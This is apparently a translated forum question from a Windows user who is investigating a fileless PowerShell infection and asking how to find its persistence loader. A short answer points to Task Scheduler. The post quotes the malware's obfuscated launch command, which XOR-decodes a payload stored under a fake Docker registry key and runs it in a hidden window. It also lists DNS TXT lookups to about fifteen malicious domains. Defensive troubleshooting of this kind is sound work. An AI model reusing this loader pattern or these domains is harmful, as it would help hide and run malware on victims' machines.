Где я могу найти загрузчик для этого вируса, который использует PowerShell?

На моем компьютере с Windows 10, через около 30 минут после включения, у меня всегда открывается окно PowerShell, которое сразу скрывается и потребляет много оперативной памяти.

Я перешел в директорию PowerShell:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

С помощью программы Что блокирует этот файл? на powershell.exe я получил PID процесса и команду, которая была выполнена:

powershell.exe
  Идентификатор процесса: 2140
  Командная строка: powershell.exe -winDOWSTYLE hIDdEn -COmMAND "ICM ([sCRIPtbLOCk]::cREatE([StRing]::JoIN('', ((get-itempROperTy -paTH 'hklM:\SoFTWare\DOCKEr InC.XzPOAG').'XzPOAGWm' | % { [char]($_ -bXOr 179) }))))"

Так как у меня есть PID, с помощью Autohokey я заставил окно показаться и получил следующее:

Resolve-DnsName : wmail-endpoint.com : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (wmail-endpoint.com:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : bideo-blog.com : Ошибка DNS-сервера
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (bideo-blog.com:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : RCODE_SERVER_FAILURE,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-blog.com : Ошибка DNS-сервера
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (privatproxy-blog.com:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : RCODE_SERVER_FAILURE,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-cdn.com : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (privatproxy-cdn.com:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-chat.com : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (ahoravideo-chat.com:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : fairu-blog.xyz : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (fairu-blog.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : fairu-chat.xyz : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (fairu-chat.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : fairu-cdn.xyz : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (fairu-cdn.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : bideo-blog.xyz : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (bideo-blog.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : bideo-schnellvpn.xyz : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (bideo-schnellvpn.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-endpoint.xyz : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (privatproxy-endpoint.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : privatproxy-chat.xyz : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (privatproxy-chat.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-blog.xyz : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (ahoravideo-blog.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-chat.xyz : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (ahoravideo-chat.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Resolve-DnsName : ahoravideo-cdn.xyz : DNS-имя не существует
В строке: 8 Символ: 16
+         $dns = Resolve-DnsName -Name $hostname -Type 'TXT'
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (ahoravideo-cdn.xyz:String) [Resolve-DnsName], Win32Exception
    + FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName

Из того, что я понимаю, он пытается подключиться к серверу, чтобы отправить мой экран (или, что еще хуже, это программа-вымогатель), но URLs больше не действительны, я предполагаю, что закон закрыл их или что-то в этом роде.

В команде упоминается Docker, однако я не использую Docker, так что это, вероятно, просто название для запутывания, я уже убедился, что удалил этот ключ реестра, хотя сохранил копию, содержание было бинарным размером примерно 19 Кб.

Спустя некоторое время запускаются эти две команды:

powershell.exe
  Идентификатор процесса: 3192
  Командная строка: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

powershell.exe
  Идентификатор процесса: 6628
  Командная строка: "powershell.exe"

И что меня здесь интригует, так это какое намерение у этих последних двух команд? Хотя PID доступен, мне было невозможно заставить окно показаться.

Итак, до этого места – отладка, что я хочу знать, основываясь на этой информации, как найти загрузчик? Потому что даже если я удалил реестр, найденный в первой команде, загрузчик все еще работает.

Скорее всего, он запускается из планировщика задач Windows, где были созданы некоторые запланированные задачи, когда он заразил ваш компьютер.